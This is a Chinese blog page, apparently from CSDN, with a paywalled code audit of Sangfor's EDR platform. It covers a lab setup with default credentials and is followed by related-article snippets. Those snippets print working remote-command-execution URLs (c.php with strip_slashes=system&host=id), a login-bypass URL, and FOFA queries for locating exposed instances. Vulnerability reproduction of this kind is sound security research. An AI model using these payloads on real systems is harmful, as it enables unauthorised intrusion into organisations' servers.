深信服PHP,深信服终端检测响应平台 EDR 代码审计

最新推荐文章于 2024-01-04 14:43:05 发布
最新推荐文章于 2024-01-04 14:43:05 发布
阅读量2.5k 收藏
点赞数
文章标签: 深信服PHP
本文分析了深信服EDR的PHP代码审计,揭示了多个低级漏洞,包括通过工具/log/c.php和/php_cli.php等实现的命令注入。通过构造特定Payload,可以执行任意命令或上传webshell,但某些情况下执行受限。
摘要由CSDN通过智能技术生成

今年 HW 深信服的 EDR 爆出了一些很低级的漏洞,也看到网上不少人再吐槽,国光也忍不住来分析复现看看。

基本配置信息

网上地下流传的深信服的 EDR ISO 文件实际上是 CentOS7 镜像,下面国光简单分享记录一下相关信息,然后面看到的朋友少走弯路。

首先 ISO 安装的话,不要使用快速安装,直接挂载即可,相关的账号密码为:

用户名

密码

root

edr@sangfor

安装完成默认是静态 IP,得配置一下 DHCP IP 即可:

vim /etc/sysconfig/network-scripts/ifcfg-eth0

主要修改下面部分

BOOTPROTO=dhcp

然后删掉 IPADDR、GATEWAY 和 NETMASK 等静态 IP 相关的设置,重启一下网络服务即可:

service network restart

查看 IP 地址,浏览器直接访问即可访问到前端登录界面:

11a5b1a2ac8ff2adba80915180d24cdb.png

初始默认的用户名和密码都为:admin

搭建好之后 直接开始复习之前网上爆出来的漏洞信息吧

/tool/log/c.php

首先$show_form 接受用户输入请求:

最低0.47元/天 解锁文章
【漏洞复现】深信服科技EDR平台存在任意用户登录漏洞
失心少年
09-08 795
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。fofa:title=“终端检测响应平台
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
漏洞危害:可执任意系统命令,影响版本:< 最新版本(3.2.21)前说到,不是把梭的 0day 都不叫 0day,所以我们可以对命令执、代码执等漏洞相关敏感函数
深信服 EDR终端检测响应平台RCE漏洞代码分析
shy的博客
08-18 7339
一觉醒来,听说护网蓝队捕获了一个深信服的0day,待我看完这部局再分析一下。 EDR简介 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 fofa语法 title="终端检测响应平台" 漏洞复现 https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 代码分析 将c.php文件拷贝到本地进行分析 $_REQUEST会将接入..
深信服 EDR终端检测响应平台RCE漏洞
汗的博客
08-18 1586
payload https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami 改改host的参数就能rce fofa语法 title="终端检测响应平台" 处理方式 只能暂时下线,貌似问题还比较多,很多要重写 资产基本是国内的,别乱打了,,, ...
深信服 EDR 终端检测响应平台 -2020HW
战神/calmness的博客
09-25 810
目录 描述 影响 ​任意用户登录 RCE 【修复建议】 深信服 EDR 终端检测响应平台 0day RCE 漏洞 描述 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 影响 攻击者可以通过构造payload绕过登录判断,
深信服终端检测响应平台EDR-远程命令执行漏洞
chaojixiaojingang
08-21 2369
1.漏洞描述 深信服终端检测响应平台EDR存在远程命令执行漏洞,通过远程访问目标文件,造成远程命令执行,获取服务器完全控制权限。 2.资产查找 Fofa: app="深信服-终端检测响应平台EDR" 3.漏洞复现 1)访问深信服终端检测响应平台:https://xx.xx.xx.37/ui/login.php 2)远程访问目标文件:https://xx.xx.xx.37/tool/log/c.php 3)远程命令执行:https://xx.xx.xx.37/tool/lo...
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(权限绕过)1
08-03
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(权限绕过)1
"深信服edr终端检测响应平台权限绕过代码审计挖掘与分析
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(权限绕过)1 最近收到有关深信服edr终端检测响应平台(_3.2.21版本)存在代码未授权远程命令执行(RCE)漏洞的情报,为了对该漏洞进行深入研究,我们进行了代码...
深信服edr代码审计:远程命令执行漏洞分析(RCE)
"深信服edr终端检测响应平台()存在代码审计挖掘出的远程命令执行(RCE)漏洞,允许攻击者执行任意系统命令。此漏洞影响版本低于3.2.21,通过搜索和分析敏感函数,如exec()等,发现 ldb_exec() 函数的自定义命令...
深信服终端检测响应平台EDR-价值主张
05-04
深信服终端检测响应平台EDR_价值主张
深信服SCSA安全工程师题库(方便大家复习备考)
热门推荐
a5a8a45的博客
04-11 1万+
1、【EDR】下列哪个端口是紧急情况下EDR管理平台和客户端通信端口,即紧急情况下用于下发Agent重启、Agent卸载和Agent停止等指令。( ) A:443.0 B:54120.0 C:8083.0 D:8088.0 正确答案B 2、【EDR】客户有7000个终端需要安装EDR客户端进行安全防护, 请问推荐部署多少个EDR管理平台( ) A:1个 B:2个 C:4个 D:6个 正确答案C 3、【EDREDR的Agent客户端不支持在以下哪种类型的终端上安装( ) A:Windows Server B
深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试
kelenwait的博客
06-24 1850
简介 深信服行为感知系统和终端检测响应平台EDR深信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。 漏洞影响 深信服EDR 3.2.16 深信服EDR 3.2.17 深信服EDR 3.2.19 深信服 行为感知系统 漏洞复现 登录界面 c.php 远程命令执行漏洞 使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l
深信服EDR(终端检测响应平台)任意用户登录POC
Websec
08-20 4563
深信服edr远程命令执行复现 1、POC payload: https://ip/ui/login.php?user=(随便写个可使用的账户即可) 例如: https://xxxxx/ui/login.php?user=admin 输入完毕以后即可使用admin权限直接登录平台 2、FOFA语法 语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94.
深信服EDR漏洞复现
黑白的博客
11-06 1798
声明 往后,复现的每个漏洞,我都会分享出来,希望可以通过这种方式,提高自己的能力,也希望大家可以一起学习,共同进步 漏洞描述 据说是有人把源码放网上了,不过看了看源码审计的骨偶成,也确实利用php反序列化,从而RCE 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC
深信服EDR终端检测响应平台)远程命令执行
Websec
08-18 4434
深信服edr远程命令执行复现 1、POC http:xxxxxx/tool/log/c.php?strip_slashes=system&host=id 2、FOFA语法 语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0 3、案例复现 漏洞页面: ...
下一代终端安全平台-深信服终端检测响应EDR.pdf
09-10
下一代终端安全平台-深信服终端检测响应EDR
深信服设备初始密码恢复
04-08
深信服设备初始密码恢复,用于设备密码忘记,可以在不清除配置的情况下,将设备密码恢复至初始状态
深信服EDR终端响应平台
m0_51186260的博客
06-14 1万+
深信服EDR检测响应平台
终端检测响应EDR
qq_42095742的博客
12-10 1万+
终端检测响应平台EDREDR深信服公司提供的一套终端安全解决方案,方案有云端、轻量级的端点安全软件(Agent)和管理平台软件(MGR)共同组成。 云端主要负责平台的升级、病毒库的升级、云查杀。 MGR负责管理维护所有Agent终端。支持统一的终端资产管理、终端病毒查杀、终端合规检查、支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 Agent端点软件支持防病毒功能、入侵...
深信服的产品详解
最新发布
qq_57476291的博客
01-04 3282
深信服的AC产品是企业网络安全的重要组成部分,它通过对网络流量进行识别与管理,实现了对访问行为的控制和监控。AC能够在网络接入层面对用户进行身份认证,根据用户的身份和权限,对其进行合理授权,从而保障企业网络的安全性。在网络安全领域,访问控制是一项重要而不可或缺的策略。深信服AC(访问控制)作为深信服产品系列中的一个关键组件,提供了强大的安全策略和访问控制机制,帮助企业有效管理和保护其网络资源。深信服EDR终端检测响应)是深信服公司推出的一款终端安全解决方案,旨在帮助企业保护终端设备免受各种威胁的侵害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值